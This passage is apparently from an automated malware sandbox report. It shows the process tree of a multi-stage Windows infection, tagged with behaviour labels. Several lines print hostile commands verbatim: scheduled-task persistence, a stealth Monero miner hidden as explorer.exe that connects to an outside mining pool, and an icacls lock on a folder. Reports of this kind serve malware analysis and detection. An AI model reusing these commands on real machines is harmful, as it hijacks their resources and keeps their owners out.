                                                                                                        • C:\Users\Admin\AppData\Local\Temp\7zS42DD3692\Sun191101c1aaa.exe
                                                                                                          Sun191101c1aaa.exe
                                                                                                          5⤵
                                                                                                          • Executes dropped EXE
                                                                                                          • Suspicious use of AdjustPrivilegeToken
                                                                                                          PID:1228
                                                                                                          • C:\Users\Admin\AppData\Local\Temp\LzmwAqmV.exe
                                                                                                            "C:\Users\Admin\AppData\Local\Temp\LzmwAqmV.exe"
                                                                                                            6⤵
                                                                                                            • Executes dropped EXE
                                                                                                            PID:4668
                                                                                                            • C:\Users\Admin\AppData\Local\Temp\Chrome 5.exe
                                                                                                              "C:\Users\Admin\AppData\Local\Temp\Chrome 5.exe"
                                                                                                              7⤵
                                                                                                              • Executes dropped EXE
                                                                                                              PID:5100
                                                                                                              • C:\Windows\System32\cmd.exe
                                                                                                                "C:\Windows\System32\cmd.exe" /c schtasks /create /f /sc onlogon /rl highest /tn "services64" /tr '"C:\Users\Admin\AppData\Roaming\services64.exe"' & exit
                                                                                                                8⤵
                                                                                                                  PID:4040
                                                                                                                  • C:\Windows\system32\schtasks.exe
                                                                                                                    schtasks /create /f /sc onlogon /rl highest /tn "services64" /tr '"C:\Users\Admin\AppData\Roaming\services64.exe"'
                                                                                                                    9⤵
                                                                                                                    • Creates scheduled task(s)
                                                                                                                    PID:5080
                                                                                                                • C:\Users\Admin\AppData\Roaming\services64.exe
                                                                                                                  "C:\Users\Admin\AppData\Roaming\services64.exe"
                                                                                                                  8⤵
                                                                                                                  • Executes dropped EXE
                                                                                                                  • Suspicious use of SetThreadContext
                                                                                                                  PID:6100
                                                                                                                  • C:\Windows\System32\cmd.exe
                                                                                                                    "C:\Windows\System32\cmd.exe" /c schtasks /create /f /sc onlogon /rl highest /tn "services64" /tr '"C:\Users\Admin\AppData\Roaming\services64.exe"' & exit
                                                                                                                    9⤵
                                                                                                                      PID:7908
                                                                                                                      • C:\Windows\system32\schtasks.exe
                                                                                                                        schtasks /create /f /sc onlogon /rl highest /tn "services64" /tr '"C:\Users\Admin\AppData\Roaming\services64.exe"'
                                                                                                                        10⤵
                                                                                                                        • Creates scheduled task(s)
                                                                                                                        PID:8172
                                                                                                                    • C:\Users\Admin\AppData\Roaming\Microsoft\Libs\sihost64.exe
                                                                                                                      "C:\Users\Admin\AppData\Roaming\Microsoft\Libs\sihost64.exe"
                                                                                                                      9⤵
                                                                                                                      • Executes dropped EXE
                                                                                                                      PID:8156
                                                                                                                    • C:\Windows\explorer.exe
                                                                                                                      C:\Windows\explorer.exe --cinit-find-x -B --algo=rx/0 --asm=auto --cpu-memory-pool=1 --randomx-mode=auto --randomx-no-rdmsr --cuda-bfactor-hint=12 --cuda-bsleep-hint=100 --url=xmr-eu2.nanopool.org:14433 --user=41o1Bi5waqLgbkV653RD7zSYeXSWRu1wnEDzPgFDFwntSnuRx7g4HbHPqNDGS6BW1bget6yyHyrPbBcVsdR6Ebxd843bMuK.add/password --pass= --cpu-max-threads-hint=30 --cinit-remote-config="v4Qq47ngFyBcSyO2uLKc6O4DG/ZgkwoY7/pmBv4ks3wJ7PR9JPsLklOJLkitFc6Y" --cinit-idle-wait=5 --cinit-idle-cpu=70 --tls --cinit-stealth
                                                                                                                      9⤵
                                                                                                                        PID:6032
                                                                                                                  • C:\Users\Admin\AppData\Local\Temp\PublicDwlBrowser1100.exe
                                                                                                                    "C:\Users\Admin\AppData\Local\Temp\PublicDwlBrowser1100.exe"
                                                                                                                    7⤵
                                                                                                                      PID:3568
                                                                                                                      • C:\ProgramData\8518382.exe
                                                                                                                        "C:\ProgramData\8518382.exe"
                                                                                                                        8⤵
                                                                                                                        • Executes dropped EXE
                                                                                                                        • Suspicious behavior: EnumeratesProcesses
                                                                                                                        PID:4964
                                                                                                                      • C:\ProgramData\4898549.exe
                                                                                                                        "C:\ProgramData\4898549.exe"
                                                                                                                        8⤵
                                                                                                                        • Executes dropped EXE
                                                                                                                        • Checks BIOS information in registry
                                                                                                                        • Checks whether UAC is enabled
                                                                                                                        • Suspicious use of NtSetInformationThreadHideFromDebugger
                                                                                                                        PID:1948
                                                                                                                      • C:\ProgramData\6577615.exe
                                                                                                                        "C:\ProgramData\6577615.exe"
                                                                                                                        8⤵
                                                                                                                        • Executes dropped EXE
                                                                                                                        • Suspicious use of SetThreadContext
                                                                                                                        PID:3920
                                                                                                                        • C:\ProgramData\6577615.exe
                                                                                                                          "C:\ProgramData\6577615.exe"
                                                                                                                          9⤵
                                                                                                                          • Executes dropped EXE
                                                                                                                          PID:5952
                                                                                                                      • C:\ProgramData\1065831.exe
                                                                                                                        "C:\ProgramData\1065831.exe"
                                                                                                                        8⤵
                                                                                                                        • Executes dropped EXE
                                                                                                                        • Checks BIOS information in registry
                                                                                                                        • Checks whether UAC is enabled
                                                                                                                        • Suspicious use of NtSetInformationThreadHideFromDebugger
                                                                                                                        PID:5592
                                                                                                                      • C:\ProgramData\4511428.exe
                                                                                                                        "C:\ProgramData\4511428.exe"
                                                                                                                        8⤵
                                                                                                                        • Executes dropped EXE
                                                                                                                        PID:5792
                                                                                                                    • C:\Users\Admin\AppData\Local\Temp\setup.exe
                                                                                                                      "C:\Users\Admin\AppData\Local\Temp\setup.exe"
                                                                                                                      7⤵
                                                                                                                      • Executes dropped EXE
                                                                                                                      PID:4312
                                                                                                                      • C:\Windows\SysWOW64\WerFault.exe
                                                                                                                        C:\Windows\SysWOW64\WerFault.exe -u -p 4312 -s 808
                                                                                                                        8⤵
                                                                                                                        • Program crash
                                                                                                                        PID:5860
                                                                                                                      • C:\Windows\SysWOW64\WerFault.exe
                                                                                                                        C:\Windows\SysWOW64\WerFault.exe -u -p 4312 -s 880
                                                                                                                        8⤵
                                                                                                                        • Program crash
                                                                                                                        PID:4432
                                                                                                                      • C:\Windows\SysWOW64\WerFault.exe
                                                                                                                        C:\Windows\SysWOW64\WerFault.exe -u -p 4312 -s 1088
                                                                                                                        8⤵
                                                                                                                        • Suspicious use of NtCreateProcessExOtherParentProcess
                                                                                                                        • Program crash
                                                                                                                        PID:4744
                                                                                                                    • C:\Users\Admin\AppData\Local\Temp\2.exe
                                                                                                                      "C:\Users\Admin\AppData\Local\Temp\2.exe"
                                                                                                                      7⤵
                                                                                                                      • Executes dropped EXE
                                                                                                                      • Suspicious use of AdjustPrivilegeToken
                                                                                                                      PID:3056
                                                                                                                    • C:\Users\Admin\AppData\Local\Temp\udptest.exe
                                                                                                                      "C:\Users\Admin\AppData\Local\Temp\udptest.exe"
                                                                                                                      7⤵
                                                                                                                      • Executes dropped EXE
                                                                                                                      PID:836
                                                                                                                    • C:\Users\Admin\AppData\Local\Temp\setup_2.exe
                                                                                                                      "C:\Users\Admin\AppData\Local\Temp\setup_2.exe"
                                                                                                                      7⤵
                                                                                                                      • Executes dropped EXE
                                                                                                                      PID:2728
                                                                                                                      • C:\Users\Admin\AppData\Local\Temp\is-05E4R.tmp\setup_2.tmp
                                                                                                                        "C:\Users\Admin\AppData\Local\Temp\is-05E4R.tmp\setup_2.tmp" /SL5="$401C6,140785,56832,C:\Users\Admin\AppData\Local\Temp\setup_2.exe"
                                                                                                                        8⤵
                                                                                                                        • Executes dropped EXE
                                                                                                                        • Loads dropped DLL
                                                                                                                        PID:3708
                                                                                                                        • C:\Users\Admin\AppData\Local\Temp\setup_2.exe
                                                                                                                          "C:\Users\Admin\AppData\Local\Temp\setup_2.exe" /SILENT
                                                                                                                          9⤵
                                                                                                                          • Executes dropped EXE
                                                                                                                          PID:5176
                                                                                                                          • C:\Users\Admin\AppData\Local\Temp\is-EUCPI.tmp\setup_2.tmp
                                                                                                                            "C:\Users\Admin\AppData\Local\Temp\is-EUCPI.tmp\setup_2.tmp" /SL5="$40262,140785,56832,C:\Users\Admin\AppData\Local\Temp\setup_2.exe" /SILENT
                                                                                                                            10⤵
                                                                                                                            • Executes dropped EXE
                                                                                                                            • Loads dropped DLL
                                                                                                                            PID:5396
                                                                                                                    • C:\Users\Admin\AppData\Local\Temp\LivelyScreenRecF18.exe
                                                                                                                      "C:\Users\Admin\AppData\Local\Temp\LivelyScreenRecF18.exe"
                                                                                                                      7⤵
                                                                                                                      • Executes dropped EXE
                                                                                                                      • Suspicious use of AdjustPrivilegeToken
                                                                                                                      PID:4084
                                                                                                                    • C:\Users\Admin\AppData\Local\Temp\5.exe
                                                                                                                      "C:\Users\Admin\AppData\Local\Temp\5.exe"
                                                                                                                      7⤵
                                                                                                                      • Executes dropped EXE
                                                                                                                      • Suspicious use of AdjustPrivilegeToken
                                                                                                                      PID:2612
                                                                                                                      • C:\Users\Admin\AppData\Local\Temp\LzmwAqmV.exe
                                                                                                                        "C:\Users\Admin\AppData\Local\Temp\LzmwAqmV.exe"
                                                                                                                        8⤵
                                                                                                                        • Executes dropped EXE
                                                                                                                        • Suspicious use of SetThreadContext
                                                                                                                        PID:5484
                                                                                                                        • C:\Users\Admin\AppData\Local\Temp\LzmwAqmV.exe
                                                                                                                          "C:\Users\Admin\AppData\Local\Temp\LzmwAqmV.exe"
                                                                                                                          9⤵
                                                                                                                          • Executes dropped EXE
                                                                                                                          PID:5628
                                                                                                                    • C:\Users\Admin\AppData\Local\Temp\3002.exe
                                                                                                                      "C:\Users\Admin\AppData\Local\Temp\3002.exe"
                                                                                                                      7⤵
                                                                                                                      • Executes dropped EXE
                                                                                                                      PID:3064
                                                                                                                      • C:\Users\Admin\AppData\Local\Temp\3002.exe
                                                                                                                        "C:\Users\Admin\AppData\Local\Temp\3002.exe" -a
                                                                                                                        8⤵
                                                                                                                        • Executes dropped EXE
                                                                                                                        PID:5736
                                                                                                                    • C:\Users\Admin\AppData\Local\Temp\BearVpn 3.exe
                                                                                                                      "C:\Users\Admin\AppData\Local\Temp\BearVpn 3.exe"
                                                                                                                      7⤵
                                                                                                                      • Executes dropped EXE
                                                                                                                      • Suspicious use of AdjustPrivilegeToken
                                                                                                                      PID:3992
                                                                                                                    • C:\Users\Admin\AppData\Local\Temp\jhuuee.exe
                                                                                                                      "C:\Users\Admin\AppData\Local\Temp\jhuuee.exe"
                                                                                                                      7⤵
                                                                                                                      • Executes dropped EXE
                                                                                                                      PID:1544
                                                                                                              • C:\Windows\SysWOW64\cmd.exe
                                                                                                                C:\Windows\system32\cmd.exe /c Sun19eb40faaaa9.exe
                                                                                                                4⤵
                                                                                                                • Suspicious use of WriteProcessMemory
                                                                                                                PID:4408
                                                                                                                • C:\Users\Admin\AppData\Local\Temp\7zS42DD3692\Sun19eb40faaaa9.exe
                                                                                                                  Sun19eb40faaaa9.exe
                                                                                                                  5⤵
                                                                                                                  • Executes dropped EXE
                                                                                                                  PID:2740
                                                                                                                  • C:\Windows\SysWOW64\WerFault.exe
                                                                                                                    C:\Windows\SysWOW64\WerFault.exe -u -p 2740 -s 1640
                                                                                                                    6⤵
                                                                                                                    • Suspicious use of NtCreateProcessExOtherParentProcess
                                                                                                                    • Program crash
                                                                                                                    PID:5776
                                                                                                              • C:\Windows\SysWOW64\cmd.exe
                                                                                                                C:\Windows\system32\cmd.exe /c Sun19de8ff4b6aefeb8.exe /mixone
                                                                                                                4⤵
                                                                                                                  PID:4472
                                                                                                                  • C:\Users\Admin\AppData\Local\Temp\7zS42DD3692\Sun19de8ff4b6aefeb8.exe
                                                                                                                    Sun19de8ff4b6aefeb8.exe /mixone
                                                                                                                    5⤵
                                                                                                                    • Executes dropped EXE
                                                                                                                    PID:848
                                                                                                                    • C:\Windows\SysWOW64\WerFault.exe
                                                                                                                      C:\Windows\SysWOW64\WerFault.exe -u -p 848 -s 656
                                                                                                                      6⤵
                                                                                                                      • Drops file in Windows directory
                                                                                                                      • Program crash
                                                                                                                      • Suspicious use of AdjustPrivilegeToken
                                                                                                                      PID:4428
                                                                                                                    • C:\Windows\SysWOW64\WerFault.exe
                                                                                                                      C:\Windows\SysWOW64\WerFault.exe -u -p 848 -s 672
                                                                                                                      6⤵
                                                                                                                      • Program crash
                                                                                                                      PID:5696
                                                                                                                    • C:\Windows\SysWOW64\WerFault.exe
                                                                                                                      C:\Windows\SysWOW64\WerFault.exe -u -p 848 -s 680
                                                                                                                      6⤵
                                                                                                                      • Program crash
                                                                                                                      PID:2628
                                                                                                                • C:\Windows\SysWOW64\cmd.exe
                                                                                                                  C:\Windows\system32\cmd.exe /c Sun1908b94df837b3158.exe
                                                                                                                  4⤵
                                                                                                                  • Suspicious use of WriteProcessMemory
                                                                                                                  PID:4416
                                                                                                                  • C:\Users\Admin\AppData\Local\Temp\7zS42DD3692\Sun1908b94df837b3158.exe
                                                                                                                    Sun1908b94df837b3158.exe
                                                                                                                    5⤵
                                                                                                                    • Executes dropped EXE
                                                                                                                    • Checks SCSI registry key(s)
                                                                                                                    • Suspicious behavior: EnumeratesProcesses
                                                                                                                    • Suspicious behavior: MapViewOfSection
                                                                                                                    PID:64
                                                                                                                • C:\Windows\SysWOW64\cmd.exe
                                                                                                                  C:\Windows\system32\cmd.exe /c Sun198361825f4.exe
                                                                                                                  4⤵
                                                                                                                    PID:4376
                                                                                                                    • C:\Users\Admin\AppData\Local\Temp\7zS42DD3692\Sun198361825f4.exe
                                                                                                                      Sun198361825f4.exe
                                                                                                                      5⤵
                                                                                                                      • Executes dropped EXE
                                                                                                                      PID:892
                                                                                                                      • C:\Windows\system32\WerFault.exe
                                                                                                                        C:\Windows\system32\WerFault.exe -u -p 892 -s 1448
                                                                                                                        6⤵
                                                                                                                        • Program crash
                                                                                                                        • Suspicious behavior: EnumeratesProcesses
                                                                                                                        • Suspicious use of AdjustPrivilegeToken
                                                                                                                        PID:4776
                                                                                                                  • C:\Windows\SysWOW64\cmd.exe
                                                                                                                    C:\Windows\system32\cmd.exe /c Sun1905815e51282417.exe
                                                                                                                    4⤵
                                                                                                                    • Suspicious use of WriteProcessMemory
                                                                                                                    PID:788
                                                                                                                    • C:\Users\Admin\AppData\Local\Temp\7zS42DD3692\Sun1905815e51282417.exe
                                                                                                                      Sun1905815e51282417.exe
                                                                                                                      5⤵
                                                                                                                      • Executes dropped EXE
                                                                                                                      PID:3176
                                                                                                                  • C:\Windows\SysWOW64\cmd.exe
                                                                                                                    C:\Windows\system32\cmd.exe /c Sun195a1614ec24e6a.exe
                                                                                                                    4⤵
                                                                                                                      PID:2312
                                                                                                                      • C:\Users\Admin\AppData\Local\Temp\7zS42DD3692\Sun195a1614ec24e6a.exe
                                                                                                                        Sun195a1614ec24e6a.exe
                                                                                                                        5⤵
                                                                                                                        • Executes dropped EXE
                                                                                                                        • Suspicious use of AdjustPrivilegeToken
                                                                                                                        PID:1344
                                                                                                                    • C:\Windows\SysWOW64\cmd.exe
                                                                                                                      C:\Windows\system32\cmd.exe /c Sun1966fb31dd5a07.exe
                                                                                                                      4⤵
                                                                                                                        PID:3192
                                                                                                                        • C:\Users\Admin\AppData\Local\Temp\7zS42DD3692\Sun1966fb31dd5a07.exe
                                                                                                                          Sun1966fb31dd5a07.exe
                                                                                                                          5⤵
                                                                                                                          • Executes dropped EXE
                                                                                                                          PID:672
                                                                                                                          • C:\Users\Admin\AppData\Local\Temp\is-FCLN1.tmp\Sun1966fb31dd5a07.tmp
                                                                                                                            "C:\Users\Admin\AppData\Local\Temp\is-FCLN1.tmp\Sun1966fb31dd5a07.tmp" /SL5="$301F4,247014,163328,C:\Users\Admin\AppData\Local\Temp\7zS42DD3692\Sun1966fb31dd5a07.exe"
                                                                                                                            6⤵
                                                                                                                            • Executes dropped EXE
                                                                                                                            • Loads dropped DLL
                                                                                                                            PID:2396
                                                                                                                            • C:\Users\Admin\AppData\Local\Temp\is-SNL2M.tmp\Ze2ro.exe
                                                                                                                              "C:\Users\Admin\AppData\Local\Temp\is-SNL2M.tmp\Ze2ro.exe" /S /UID=burnerch2
                                                                                                                              7⤵
                                                                                                                              • Executes dropped EXE
                                                                                                                              PID:2780
                                                                                                                              • C:\Program Files\Java\EDIXSVMXTN\ultramediaburner.exe
                                                                                                                                "C:\Program Files\Java\EDIXSVMXTN\ultramediaburner.exe" /VERYSILENT
                                                                                                                                8⤵
                                                                                                                                • Executes dropped EXE
                                                                                                                                PID:5656
                                                                                                                                • C:\Users\Admin\AppData\Local\Temp\is-UQIHK.tmp\ultramediaburner.tmp
                                                                                                                                  "C:\Users\Admin\AppData\Local\Temp\is-UQIHK.tmp\ultramediaburner.tmp" /SL5="$10392,281924,62464,C:\Program Files\Java\EDIXSVMXTN\ultramediaburner.exe" /VERYSILENT
                                                                                                                                  9⤵
                                                                                                                                  • Executes dropped EXE
                                                                                                                                  • Drops file in Program Files directory
                                                                                                                                  • Suspicious use of FindShellTrayWindow
                                                                                                                                  PID:4512
                                                                                                                                  • C:\Program Files (x86)\UltraMediaBurner\UltraMediaBurner.exe
                                                                                                                                    "C:\Program Files (x86)\UltraMediaBurner\UltraMediaBurner.exe" -silent -desktopShortcut -programMenu
                                                                                                                                    10⤵
                                                                                                                                    • Executes dropped EXE
                                                                                                                                    PID:5312
                                                                                                                              • C:\Users\Admin\AppData\Local\Temp\84-7df02-ba5-722b2-cd753c85cc69d\Careloteva.exe
                                                                                                                                "C:\Users\Admin\AppData\Local\Temp\84-7df02-ba5-722b2-cd753c85cc69d\Careloteva.exe"
                                                                                                                                8⤵
                                                                                                                                • Executes dropped EXE
                                                                                                                                • Checks computer location settings
                                                                                                                                PID:1144
                                                                                                                              • C:\Users\Admin\AppData\Local\Temp\72-d5985-16b-16985-84546b185a346\Lytiquxave.exe
                                                                                                                                "C:\Users\Admin\AppData\Local\Temp\72-d5985-16b-16985-84546b185a346\Lytiquxave.exe"
                                                                                                                                8⤵
                                                                                                                                • Executes dropped EXE
                                                                                                                                PID:3516
                                                                                                                                • C:\Windows\System32\cmd.exe
                                                                                                                                  "C:\Windows\System32\cmd.exe" /k C:\Users\Admin\AppData\Local\Temp\afdpm0ln.hq2\GcleanerEU.exe /eufive & exit
                                                                                                                                  9⤵
                                                                                                                                    PID:6248
                                                                                                                                    • C:\Users\Admin\AppData\Local\Temp\afdpm0ln.hq2\GcleanerEU.exe
                                                                                                                                      C:\Users\Admin\AppData\Local\Temp\afdpm0ln.hq2\GcleanerEU.exe /eufive
                                                                                                                                      10⤵
                                                                                                                                      • Executes dropped EXE
                                                                                                                                      PID:5096
                                                                                                                                  • C:\Windows\System32\cmd.exe
                                                                                                                                    "C:\Windows\System32\cmd.exe" /k C:\Users\Admin\AppData\Local\Temp\evxvjsb3.tqd\installer.exe /qn CAMPAIGN="654" & exit
                                                                                                                                    9⤵
                                                                                                                                      PID:6420
                                                                                                                                      • C:\Users\Admin\AppData\Local\Temp\evxvjsb3.tqd\installer.exe
                                                                                                                                        C:\Users\Admin\AppData\Local\Temp\evxvjsb3.tqd\installer.exe /qn CAMPAIGN="654"
                                                                                                                                        10⤵
                                                                                                                                        • Executes dropped EXE
                                                                                                                                        • Loads dropped DLL
                                                                                                                                        • Enumerates connected drives
                                                                                                                                        • Modifies system certificate store
                                                                                                                                        • Suspicious use of FindShellTrayWindow
                                                                                                                                        PID:6528
                                                                                                                                        • C:\Windows\SysWOW64\msiexec.exe
                                                                                                                                          "C:\Windows\system32\msiexec.exe" /i "C:\Users\Admin\AppData\Roaming\AW Manager\Windows Manager 1.0.0\install\97FDF62\Windows Manager - Postback Y.msi" /qn CAMPAIGN=654 AI_SETUPEXEPATH=C:\Users\Admin\AppData\Local\Temp\evxvjsb3.tqd\installer.exe SETUPEXEDIR=C:\Users\Admin\AppData\Local\Temp\evxvjsb3.tqd\ EXE_CMD_LINE="/exenoupdates /forcecleanup /wintime 1632174520 /qn CAMPAIGN=""654"" " CAMPAIGN="654"
                                                                                                                                          11⤵
                                                                                                                                            PID:6300
                                                                                                                                      • C:\Windows\System32\cmd.exe
                                                                                                                                        "C:\Windows\System32\cmd.exe" /k C:\Users\Admin\AppData\Local\Temp\jdvjvbiw.fsy\anyname.exe & exit
                                                                                                                                        9⤵
                                                                                                                                          PID:6720
                                                                                                                                          • C:\Users\Admin\AppData\Local\Temp\jdvjvbiw.fsy\anyname.exe
                                                                                                                                            C:\Users\Admin\AppData\Local\Temp\jdvjvbiw.fsy\anyname.exe
                                                                                                                                            10⤵
                                                                                                                                            • Executes dropped EXE
                                                                                                                                            PID:6452
                                                                                                                                        • C:\Windows\System32\cmd.exe
                                                                                                                                          "C:\Windows\System32\cmd.exe" /k C:\Users\Admin\AppData\Local\Temp\jvawqdek.xse\gcleaner.exe /mixfive & exit
                                                                                                                                          9⤵
                                                                                                                                            PID:7148
                                                                                                                                            • C:\Users\Admin\AppData\Local\Temp\jvawqdek.xse\gcleaner.exe
                                                                                                                                              C:\Users\Admin\AppData\Local\Temp\jvawqdek.xse\gcleaner.exe /mixfive
                                                                                                                                              10⤵
                                                                                                                                              • Executes dropped EXE
                                                                                                                                              PID:6216
                                                                                                                          • C:\Windows\SysWOW64\rundll32.exe
                                                                                                                            rundll32.exe "C:\Users\Admin\AppData\Local\Temp\sqlite.dll",global
                                                                                                                            1⤵
                                                                                                                            • Loads dropped DLL
                                                                                                                            PID:5972
                                                                                                                          • C:\Windows\system32\rundll32.exe
                                                                                                                            rundll32.exe "C:\Users\Admin\AppData\Local\Temp\sqlite.dll",global
                                                                                                                            1⤵
                                                                                                                            • Process spawned unexpected child process
                                                                                                                            PID:5892
                                                                                                                          • C:\Windows\system32\rundll32.exe
                                                                                                                            rundll32.exe "C:\Users\Admin\AppData\Local\Temp\sqlite.dll",global
                                                                                                                            1⤵
                                                                                                                            • Process spawned unexpected child process
                                                                                                                            PID:3192
                                                                                                                            • C:\Windows\SysWOW64\rundll32.exe
                                                                                                                              rundll32.exe "C:\Users\Admin\AppData\Local\Temp\sqlite.dll",global
                                                                                                                              2⤵
                                                                                                                              • Loads dropped DLL
                                                                                                                              PID:5420
                                                                                                                          • C:\Windows\SystemApps\Microsoft.MicrosoftEdge_8wekyb3d8bbwe\MicrosoftEdge.exe
                                                                                                                            "C:\Windows\SystemApps\Microsoft.MicrosoftEdge_8wekyb3d8bbwe\MicrosoftEdge.exe" -ServerName:MicrosoftEdge.AppXdnhjhccw3zf0j06tkg3jtqr00qdm0khc.mca
                                                                                                                            1⤵
                                                                                                                            • Drops file in Windows directory
                                                                                                                            • Modifies Internet Explorer settings
                                                                                                                            • Modifies registry class
                                                                                                                            • Suspicious use of SetWindowsHookEx
                                                                                                                            PID:6620
                                                                                                                          • C:\Windows\system32\browser_broker.exe
                                                                                                                            C:\Windows\system32\browser_broker.exe -Embedding
                                                                                                                            1⤵
                                                                                                                            • Modifies Internet Explorer settings
                                                                                                                            PID:6908
                                                                                                                          • C:\Windows\system32\msiexec.exe
                                                                                                                            C:\Windows\system32\msiexec.exe /V
                                                                                                                            1⤵
                                                                                                                            • Enumerates connected drives
                                                                                                                            • Drops file in Program Files directory
                                                                                                                            • Drops file in Windows directory
                                                                                                                            • Modifies data under HKEY_USERS
                                                                                                                            • Modifies registry class
                                                                                                                            PID:7188
                                                                                                                            • C:\Windows\syswow64\MsiExec.exe
                                                                                                                              C:\Windows\syswow64\MsiExec.exe -Embedding 04FA89A56FA023B77A173793BCCD25D4 C
                                                                                                                              2⤵
                                                                                                                              • Loads dropped DLL
                                                                                                                              PID:7420
                                                                                                                            • C:\Windows\syswow64\MsiExec.exe
                                                                                                                              C:\Windows\syswow64\MsiExec.exe -Embedding 037B7431802B557C833491E6DFB90F67
                                                                                                                              2⤵
                                                                                                                                PID:7148
                                                                                                                                • C:\Windows\SysWOW64\taskkill.exe
                                                                                                                                  "C:\Windows\SysWOW64\taskkill.exe" /im AdvancedWindowsManager* /f
                                                                                                                                  3⤵
                                                                                                                                  • Kills process with taskkill
                                                                                                                                  PID:5164
                                                                                                                              • C:\Windows\syswow64\MsiExec.exe
                                                                                                                                C:\Windows\syswow64\MsiExec.exe -Embedding ED95A412446182C3FE5F0C503A02DDEE E Global\MSI0000
                                                                                                                                2⤵
                                                                                                                                • Loads dropped DLL
                                                                                                                                PID:5664
                                                                                                                            • C:\Windows\SystemApps\Microsoft.MicrosoftEdge_8wekyb3d8bbwe\MicrosoftEdgeCP.exe
                                                                                                                              "C:\Windows\SystemApps\Microsoft.MicrosoftEdge_8wekyb3d8bbwe\MicrosoftEdgeCP.exe" -ServerName:ContentProcess.AppX6z3cwk4fvgady6zya12j1cw28d228a7k.mca
                                                                                                                              1⤵
                                                                                                                              • Modifies registry class
                                                                                                                              • Suspicious behavior: MapViewOfSection
                                                                                                                              • Suspicious use of SetWindowsHookEx
                                                                                                                              PID:7304
                                                                                                                            • C:\Windows\SystemApps\Microsoft.MicrosoftEdge_8wekyb3d8bbwe\MicrosoftEdgeCP.exe
                                                                                                                              "C:\Windows\SystemApps\Microsoft.MicrosoftEdge_8wekyb3d8bbwe\MicrosoftEdgeCP.exe" -ServerName:ContentProcess.AppX6z3cwk4fvgady6zya12j1cw28d228a7k.mca
                                                                                                                              1⤵
                                                                                                                              • Drops file in Windows directory
                                                                                                                              • Modifies Internet Explorer settings
                                                                                                                              • Modifies registry class
                                                                                                                              PID:7688
                                                                                                                            • C:\Windows\system32\rundll32.exe
                                                                                                                              rundll32.exe "C:\Users\Admin\AppData\Local\Temp\sqlite.dll",global
                                                                                                                              1⤵
                                                                                                                              • Process spawned unexpected child process
                                                                                                                              • Blocklisted process makes network request
                                                                                                                              • Executes dropped EXE
                                                                                                                              • Suspicious use of AdjustPrivilegeToken
                                                                                                                              PID:3568
                                                                                                                              • C:\Windows\SysWOW64\rundll32.exe
                                                                                                                                rundll32.exe "C:\Users\Admin\AppData\Local\Temp\sqlite.dll",global
                                                                                                                                2⤵
                                                                                                                                • Loads dropped DLL
                                                                                                                                PID:7288
                                                                                                                            • C:\Windows\SystemApps\Microsoft.MicrosoftEdge_8wekyb3d8bbwe\MicrosoftEdgeCP.exe
                                                                                                                              "C:\Windows\SystemApps\Microsoft.MicrosoftEdge_8wekyb3d8bbwe\MicrosoftEdgeCP.exe" -ServerName:ContentProcess.AppX6z3cwk4fvgady6zya12j1cw28d228a7k.mca
                                                                                                                              1⤵
                                                                                                                                PID:7884
                                                                                                                              • C:\Users\Admin\AppData\Local\Temp\4449.exe
                                                                                                                                C:\Users\Admin\AppData\Local\Temp\4449.exe
                                                                                                                                1⤵
                                                                                                                                • Executes dropped EXE
                                                                                                                                PID:5716
                                                                                                                              • C:\Windows\SystemApps\Microsoft.MicrosoftEdge_8wekyb3d8bbwe\MicrosoftEdgeCP.exe
                                                                                                                                "C:\Windows\SystemApps\Microsoft.MicrosoftEdge_8wekyb3d8bbwe\MicrosoftEdgeCP.exe" -ServerName:ContentProcess.AppX6z3cwk4fvgady6zya12j1cw28d228a7k.mca
                                                                                                                                1⤵
                                                                                                                                • Drops file in Drivers directory
                                                                                                                                • Adds Run key to start application
                                                                                                                                • Drops file in Program Files directory
                                                                                                                                • Modifies registry class
                                                                                                                                PID:2780
                                                                                                                              • C:\Windows\SystemApps\Microsoft.MicrosoftEdge_8wekyb3d8bbwe\MicrosoftEdgeCP.exe
                                                                                                                                "C:\Windows\SystemApps\Microsoft.MicrosoftEdge_8wekyb3d8bbwe\MicrosoftEdgeCP.exe" -ServerName:ContentProcess.AppX6z3cwk4fvgady6zya12j1cw28d228a7k.mca
                                                                                                                                1⤵
                                                                                                                                  PID:4092
                                                                                                                                • C:\Users\Admin\AppData\Local\Temp\6A21.exe
                                                                                                                                  C:\Users\Admin\AppData\Local\Temp\6A21.exe
                                                                                                                                  1⤵
                                                                                                                                  • Executes dropped EXE
                                                                                                                                  • Suspicious use of SetThreadContext
                                                                                                                                  PID:4072
                                                                                                                                  • C:\Users\Admin\AppData\Local\Temp\6A21.exe
                                                                                                                                    C:\Users\Admin\AppData\Local\Temp\6A21.exe
                                                                                                                                    2⤵
                                                                                                                                    • Executes dropped EXE
                                                                                                                                    • Adds Run key to start application
                                                                                                                                    PID:7468
                                                                                                                                    • C:\Windows\SysWOW64\icacls.exe
                                                                                                                                      icacls "C:\Users\Admin\AppData\Local\a8021ef6-78ab-4f1d-9fb3-bc7945c4d3ec" /deny *S-1-1-0:(OI)(CI)(DE,DC)
                                                                                                                                      3⤵
                                                                                                                                      • Modifies file permissions
                                                                                                                                      PID:5892
                                                                                                                                    • C:\Users\Admin\AppData\Local\Temp\6A21.exe
                                                                                                                                      "C:\Users\Admin\AppData\Local\Temp\6A21.exe" --Admin IsNotAutoStart IsNotTask
                                                                                                                                      3⤵
                                                                                                                                      • Executes dropped EXE
                                                                                                                                      • Suspicious use of SetThreadContext
                                                                                                                                      PID:4680
                                                                                                                                      • C:\Users\Admin\AppData\Local\Temp\6A21.exe
                                                                                                                                        "C:\Users\Admin\AppData\Local\Temp\6A21.exe" --Admin IsNotAutoStart IsNotTask
                                                                                                                                        4⤵
                                                                                                                                        • Executes dropped EXE
                                                                                                                                        • Modifies extensions of user files
                                                                                                                                        PID:2436
                                                                                                                                        • C:\Users\Admin\AppData\Local\80612404-f150-4f3e-a779-71cbe38bfdf0\build2.exe
                                                                                                                                          "C:\Users\Admin\AppData\Local\80612404-f150-4f3e-a779-71cbe38bfdf0\build2.exe"
                                                                                                                                          5⤵
                                                                                                                                          • Suspicious use of SetThreadContext
                                                                                                                                          PID:4336
                                                                                                                                          • C:\Users\Admin\AppData\Local\80612404-f150-4f3e-a779-71cbe38bfdf0\build2.exe
                                                                                                                                            "C:\Users\Admin\AppData\Local\80612404-f150-4f3e-a779-71cbe38bfdf0\build2.exe"
                                                                                                                                            6⤵
                                                                                                                                            • Loads dropped DLL
                                                                                                                                            • Checks processor information in registry
                                                                                                                                            PID:2616
                                                                                                                                            • C:\Windows\SysWOW64\cmd.exe
